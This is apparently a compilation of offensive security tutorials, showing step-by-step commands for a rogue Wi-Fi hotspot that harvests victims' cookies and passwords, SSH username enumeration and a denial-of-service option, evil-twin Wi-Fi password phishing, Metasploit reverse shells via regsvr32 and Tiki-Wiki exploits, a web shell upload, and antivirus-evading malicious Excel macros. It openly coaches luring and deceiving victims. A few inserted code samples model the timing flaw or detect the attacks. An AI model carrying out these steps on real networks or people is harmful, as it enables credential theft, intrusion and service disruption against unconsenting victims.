Once the clone is done, go to the WiFi-Pumpkin directory, open it in a terminal and install it with:

./installer.sh --install

Now, from the same directory, start it with:

python wifi-pumpkin.py

It will load wifi pumpkin in GUI as you can see in the screenshot below.

Now configure your settings and click on 'Start Access Point'.

Wait for devices to connect; they are listed as shown below. Connected devices are automatically assigned an IP address by the access point's DHCP service.

On the victim's phone an AP named PumpAP appears, and he/she browses the internet without knowing that the traffic is passing through our machine.

While the victim uses the Wi-Fi as usual, we can see his/her activity. In the screenshot below we captured the contacts from the Hike app on the victim's phone.

As soon as the victim opens someone's profile in Hike, that number is captured by us.

Another notable feature is cookie capturing. In the screenshot below the victim device's cookies are visible, which is worth a look as they may contain session tokens.

We can also capture credentials (login ID and password) submitted to any plain-HTTP website; logins over HTTPS are not exposed this way.

As you can see below, the victim logged in to way2sms.com and the ID and password were recorded.

When many victims connect to the fake wireless network thinking they are in luck, everything is recorded in clear text. If you cannot follow it all in the terminal, don't worry: WiFi-Pumpkin stores everything category-wise.

Now, we go to the directory:

/WiFi-Pumpkin/logs/AccessPoint

That directory contains many log files with the captured items. One such text file is credentials.log, where all the login details are kept.

Another notable file is urls.log, which lists all the URLs accessed from the victim's device along with its IP address.

So this is how you lure victims with free internet and collect their data without them noticing.


OpenSSH User Enumeration Time-Based Attack with Osueta


OpenSSH (also known as OpenBSD Secure Shell) is a suite of security-related network-level utilities based on the Secure Shell (SSH) protocol, which help to secure network communications via the encryption of network traffic over multiple authentication methods and by providing secure tunneling capabilities.

OpenSSH was designed to evade various attacks like MITM , eavesdropping by encrypting all the traffic but an attack known as User-Enumeration Time Based Attack was discovered which helps in effectively increasing the brute force attack efficiency by guessing the usernames firsthand as in a Brute Force attack two fields are required Username and Password and we will be able to guess the Username correctly thus decreasing the time required for Brute Force Attack as of now only Password field is to be Brute Forced.

Osueta, a simple Python script, was developed to exploit the OpenSSH User Enumeration Timing Attack (found in OpenSSH 5.* and 6.* versions on *nix systems).

How this works

When we want to connect to an SSH server we have to provide a username and a password. First it is checked whether the username exists; then:

1.) If the username doesn't exist, the password is not compared to the original one.

2.) If the username exists, the password is compared to the original one by comparing the hash of the given password; if it matches, you are granted access.

3.) Now suppose a username exists and we are using a very long password, say of length 40000 bytes, which is the default length used by osueta (40000 'S' characters). The hash of the given password has to be generated in order to compare it with the original one; as a result the server slows down and the measured response time increases. That delay is the key: it tells us that the username exists.
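The three cases above, as an added illustration that is not part of the original post or of osueta: a constructed authenticator that skips hashing for unknown users (the leaky behaviour) beside a hardened one that hashes against a dummy record, so the cost no longer reveals whether the user exists. Work is counted in hash operations rather than wall-clock time so the leak is deterministic and testable; the user database, salt and passwords are constructed.

```python
import hashlib
import hmac

# Constructed user database: username -> salted SHA-256 of the password.
SALT = b"constructed-salt"


def hash_password(password: bytes) -> bytes:
    return hashlib.sha256(SALT + password).digest()


USERS = {"pp": hash_password(b"correct horse"), "root": hash_password(b"toor")}
DUMMY_HASH = hash_password(b"placeholder")  # compared against for unknown users


def leaky_auth(username: str, password: bytes):
    """Models the vulnerable behaviour: an unknown user skips the hash entirely,
    so the response cost (and time) differs between existing and missing users.
    Returns (access_granted, hash_operations_performed)."""
    work = 0
    if username not in USERS:
        return False, work          # case 1: no hashing at all
    work += 1                       # case 2/3: hash the supplied password
    return hmac.compare_digest(hash_password(password), USERS[username]), work


def fixed_auth(username: str, password: bytes):
    """Hardened variant: always hash the supplied password, comparing against a
    dummy record when the user is unknown, so the cost is identical either way."""
    stored = USERS.get(username, DUMMY_HASH)
    work = 1
    matched = hmac.compare_digest(hash_password(password), stored)
    # An unknown user must still be refused even if they happened to hit the dummy.
    return matched and username in USERS, work


def probe(auth, username: str, length: int = 40000) -> int:
    """Osueta-style probe: send a very long password and observe only the cost."""
    return auth(username, b"S" * length)[1]
```

With the leaky authenticator the probe returns different costs for "pp" and for a nonexistent name; with the hardened one it cannot tell them apart.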

First clone the GitHub repo with the terminal command:

git clone https://github.com/c0r3dump3d/osueta.git

Now change your directory to osueta and run the following command:

python osueta.py -H 192.168.222.136 -U pp -p 22

-H (OpenSSH server host, i.e. the victim IP; 192.168.222.136 in my case)

-U (any guessed username which may be present on the victim machine; pp in my case)

-p (port number of the running SSH service; 22 in our case)

First it checks whether the given port is open, then the service banner is read to determine the version of the running SSH server.

Now it generates 10 random usernames to try against the target server in order to measure the server's baseline response time. After that it tests the server with the provided username, and if there is a delay in user authentication then the user exists; in my case the user pp exists on the target server.

We can also pass a list of users as input to check every username in the list, with the command:

./osueta.py -H 192.168.222.136 -L users.txt -p 22

-L (user input file; users.txt in my case)

In my case it has successfully enumerated the following usernames from the given list:

pp

root

him

We can also create a DoS (Denial of Service) situation on the target server with the command:

./osueta.py -H 192.168.222.136 -p 22 -U pp -v no --dos yes

--dos (set to yes if you want to create a DoS situation)

First it detects whether the given user exists; if so, it opens a large number of connections to the target server, and when the maximum number of sessions is reached the target server starts rejecting further connections, causing a DoS.

As you can see, the target server is denying any connection when I try to connect to it.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn.



Hack Wifi using Evil Twin Method with Linset in kali Linux


Linset is a tool for the Evil Twin attack.

How it works

  • Scans the networks.
  • Selects a network.
  • Captures the handshake (can be used without a handshake).
  • Lets you choose one of several web interfaces (contributed by users).
  • Mounts a FakeAP imitating the original.
  • A DHCP server is created on the FakeAP.
  • It creates a DNS server to redirect all requests to the host.
  • The web server with the selected interface is launched.
  • The mechanism that checks the validity of the passwords entered is launched.
  • It deauthenticates all users of the network, hoping they connect to the FakeAP and enter the password.
  • The attack stops once the correct password has been verified.

First of all, download Linset from GitHub with the command:

git clone https://github.com/vk496/linset.git

Then change the permissions of the linset script with the command:

chmod +x linset

Then execute it with the command:

./linset

After execution it will ask you to choose the interface; select wlan0 (the wireless interface), which will be put into monitor mode.

Then it will ask you to select the channel; enter 1 to select all channels.

Now monitor mode will listen for all available Wi-Fi networks, so wait till your target appears and then press Ctrl+C.

Now it will list all the APs with their SSID, ID number and signal strength; enter the ID of your target and hit Enter. In my case I selected rajlab by entering 1.

Now select Hostapd by entering 1, which will help in creating the fake AP.

Now hit Enter to use the default path for saving the capture file, or give a custom path. It will then ask you to select the method for cracking the handshake; select 1 for aircrack-ng.

Now select 1 to de-authenticate all the clients connected to the target AP in order to capture the handshake.

Once the handshake is captured you will see it in the top right corner of the new window; then enter 1 in the menu window, as we have captured the handshake.

Now select 1 for the web interface that will be presented to the victim when they connect to our fake AP.

Now it will ask for the language of the web interface; enter 1 for English.

Now 4 terminal windows will open: one creates the fake AP, one regularly de-authenticates all the clients, and one shows all the information about the AP.

Now, as you can see, there are 2 rajlab APs present, of which one is fake and open and the other is the original; the clients will not be able to connect to the original one due to our deauth attack, so they will be forced to connect to our fake AP.
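The condition just described, a second open AP advertising the real network's SSID, is exactly what a wireless monitor can flag. As an added example that is not part of the original post or of Linset, the script below parses a constructed scan table (BSSID, channel, encryption, ESSID; in practice this would come from a scanner's export) and raises an alert both for an unknown BSSID on a managed SSID and for an open AP that duplicates a protected SSID. The BSSIDs, SSIDs and allowlist are all constructed.

```python
from collections import defaultdict

# Constructed scan results: BSSID, channel, encryption, ESSID (one AP per line).
SCAN = """\
AA:BB:CC:DD:EE:01  6  WPA2  rajlab
AA:BB:CC:DD:EE:02  11 WPA2  guest
DE:AD:BE:EF:00:01  6  OPN   rajlab
"""

# Constructed allowlist: the BSSIDs we know to be legitimate for each SSID we run.
KNOWN = {"rajlab": {"AA:BB:CC:DD:EE:01"}}


def parse_scan(text: str):
    """Turn the whitespace-separated scan table into a list of AP dicts."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue                      # skip blank or malformed lines
        bssid, channel, enc = parts[0].upper(), int(parts[1]), parts[2].upper()
        essid = " ".join(parts[3:])       # SSIDs may contain spaces
        rows.append({"bssid": bssid, "channel": channel, "enc": enc, "essid": essid})
    return rows


def find_evil_twins(rows, known=KNOWN):
    """Return (essid, bssid, reason) for every access point that looks like a twin."""
    by_essid = defaultdict(list)
    for r in rows:
        by_essid[r["essid"]].append(r)
    alerts = []
    for essid, aps in by_essid.items():
        encs = {a["enc"] for a in aps}
        for a in aps:
            if essid in known and a["bssid"] not in known[essid]:
                alerts.append((essid, a["bssid"], "unknown BSSID for managed SSID"))
            elif len(encs) > 1 and a["enc"] == "OPN":
                # Same name seen both protected and open: the open one is suspect.
                alerts.append((essid, a["bssid"], "open AP duplicates a protected SSID"))
    return alerts


if __name__ == "__main__":
    for alert in find_evil_twins(parse_scan(SCAN)):
        print("ALERT:", *alert)
```

The allowlist check catches a twin even when the attacker also enables WPA2 on the fake AP; the encryption check still fires for SSIDs you do not administer.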

After connecting to the fake AP, the victim's browser will be redirected to the web page shown below, which requires the victim to enter the original AP password; the attack only stops when the victim enters the correct password.

After the correct password is submitted, the attack stops and a message is shown saying that the connection will be restored.

As you can see, in my case the victim entered the correct password and we found the key:

KEY FOUND! [ raj123987 ]

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn.


Hack Remote Windows PC using Regsvr32.exe (.sct) Application Whitelisting Bypass Server


This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.
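Because the technique hinges on regsvr32.exe fetching its install string from a remote URL, that behaviour is also what defenders look for in process-creation telemetry. As an added example that is not part of the original post or of the Metasploit module, the code below runs that check over constructed process-creation events (Sysmon-style image and command-line fields are assumed; the host, port and file name in the sample are placeholders).

```python
import re

# Constructed sample events: a normal local DLL registration, a remote-scriptlet
# fetch of the kind the module relies on, and an unrelated process.
EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://192.168.0.124:8080/EXAMPLE.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# /i: followed by a URL means the install string is retrieved from the network.
REMOTE_INSTALL_STRING = re.compile(r"/i:\s*(https?|ftp)://", re.IGNORECASE)


def is_remote_scriptlet_load(event: dict) -> bool:
    """True when regsvr32 is pointed at a remote URL, or loads the scriptlet
    handler (scrobj.dll) together with any URL on its command line."""
    image_name = event["image"].lower().rsplit("\\", 1)[-1]
    if image_name != "regsvr32.exe":
        return False
    cmd = event["cmdline"]
    if REMOTE_INSTALL_STRING.search(cmd):
        return True
    return "scrobj.dll" in cmd.lower() and "://" in cmd


def triage(events) -> list:
    """Return the command lines of every event that matches the pattern."""
    return [e["cmdline"] for e in events if is_remote_scriptlet_load(e)]


if __name__ == "__main__":
    for cmdline in triage(EVENTS):
        print("suspicious regsvr32 invocation:", cmdline)
```

A local DLL registration by the same binary does not match, so the rule does not fire on routine installer activity.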

Exploit Targets

Windows 7/8/8.1/10

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open the Kali terminal and type msfconsole


Now type use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit (regsvr32_applocker_bypass_server)>set payload windows/meterpreter/reverse_tcp

msf exploit (regsvr32_applocker_bypass_server)>set lhost 192.168.0.124 (IP of Local Host)

msf exploit (regsvr32_applocker_bypass_server)>set srvhost 192.168.0.124

msf exploit (regsvr32_applocker_bypass_server)>set srvport 8080

msf exploit (regsvr32_applocker_bypass_server)>exploit


Now we have to paste the generated regsvr32 command into the Run box on the victim's PC, using a social engineering method.

As soon as that is done, we will get access to the victim's PC.


Now type sessions -i to display the sessions opened once the victim has run the command.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.



Exploit Remote Server using Tiki-Wiki CMS Calendar Command Execution


Tiki-Wiki CMS's calendar module contains a remote code execution vulnerability in the viewmode GET parameter. The calendar module is NOT enabled by default. If enabled, the default permissions do NOT allow anonymous users to access it. Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14. Verified/tested against 14.1.

Exploit Targets

tiki-wiki 14.1

Requirement

Attacker: kali Linux

Victim PC: Linux, Windows

Open the Kali terminal and type msfconsole

Now type use exploit/linux/http/tiki_calendar_exec

msf exploit (tiki_calendar_exec)>set targeturi /tiki

msf exploit (tiki_calendar_exec)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (tiki_calendar_exec)>set username admin

msf exploit (tiki_calendar_exec)>set password raj123

msf exploit (tiki_calendar_exec)>set rport 81

msf exploit (tiki_calendar_exec)>exploit


Hack Web Server using PHP Command Injection (Smplshllctrlr)


Smplshllctrlr is a PHP command injection exploitation tool; for the demo we will be using DVWA (Damn Vulnerable Web App).

1.) Exploit web page and upload simple-shell.php (or simply find an existing exploitable command injection).

2.) Execute the controller to exploit the command injection vulnerability. The controller is simply a command injection exploitation tool, and can therefore, with a few adjustments, be rewritten to exploit already existing vulnerabilities without the need to upload 'simple-shell.php'.

Here we will be exploiting the File Uploading vulnerability in DVWA by uploading a custom shell and executing it.

First clone the GitHub repo with the command:

git clone https://github.com/z0noxz/smplshllctrlr.git

Now give the script permission to execute by entering the cloned folder and running the command:

chmod +x simple-shell-controller.py

Now open DVWA in your browser and go to the upload vulnerability tab, from where we will upload our reverse shell named simple-shell.php.

Now click on the Browse button and select the simple-shell.php present in the cloned smplshllctrlr folder.

Now click on Upload to upload the shell to the server.

After uploading the shell it will tell us the path of the uploaded shell: ../../hackable/uploads/simple-shell.php.

Now run the following command:

python simple-shell-controller.py --url "http://192.168.222.1/dvwa/hackable/uploads/simple-shell.php"

As you can see, it has successfully returned a command shell.

Here --url is the URL of the shell uploaded in the previous step.

Author: Himanshu Gupta is an Information Security Researcher | Technical writer. You can follow him on LinkedIn.


Hack Remote PC using Malicious MS Office Documents


Veil-Evasion is a powerful tool to generate payload executables that bypass common antivirus solutions.

To install Veil-Evasion on your Kali Linux, type:

apt-get install veil-evasion

After the installation completes, run Veil-Evasion with the following command in the terminal, from the directory where it is installed:

veil-evasion

To see the available payloads, type list

We can see a menu of the available payloads; there are plenty to choose from.

We will be using payload ID 24. We type the command:

use powershell/meterpreter/rev_tcp

After that, set the local host (your PC's IP). In my case it is 192.168.0.122. Hence:

set lhost  192.168.0.122

set lport 4444

And then generate the payload:

generate

Enter the name of the file. Let the name of the file to be generated be demo. Therefore:

>demo

Now the Veil-Evasion tool has created a bat file containing PowerShell code in the directory:

/var/lib/veil-evasion/output/source/demo.bat

Now open a new terminal, open Veil-Evasion again (using the command 'veil-evasion') and type:

use auxiliary/macro_converter

macro_converter converts the bat file into a readable txt file. Under this, type the following commands to generate the txt file:

set POSH_BATCH /var/lib/veil-evasion/output/source/demo.bat

generate

This generates a txt file in the /var/lib/veil-evasion/output directory.

Copy the code written in the generated txt file.

Now, in Windows, open a New Microsoft Office Excel Worksheet -> View (on the top bar) -> Macro

Enter the macro name -> Create

Then in the macro editing area (or the workbook), paste the code present in "demo1.txt" and save the macro.

Now edit the Microsoft Excel worksheet to make it look authentic, in such a way that the victim will definitely enable the Macro option (given it is disabled).

Just for simplicity in this tutorial, I enter something random and save it as a Microsoft Excel 97-2003 document.

Now all you have to do is wait for the victim to open the Excel file and enable the Macros option.

Meanwhile, go to the Kali Linux terminal, open the Metasploit framework (msfconsole) and type the following commands:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.122

set lport 4444

exploit

Author: Harshit Rajpal is an InfoSec researcher and has a keen interest in technology. Contact here.

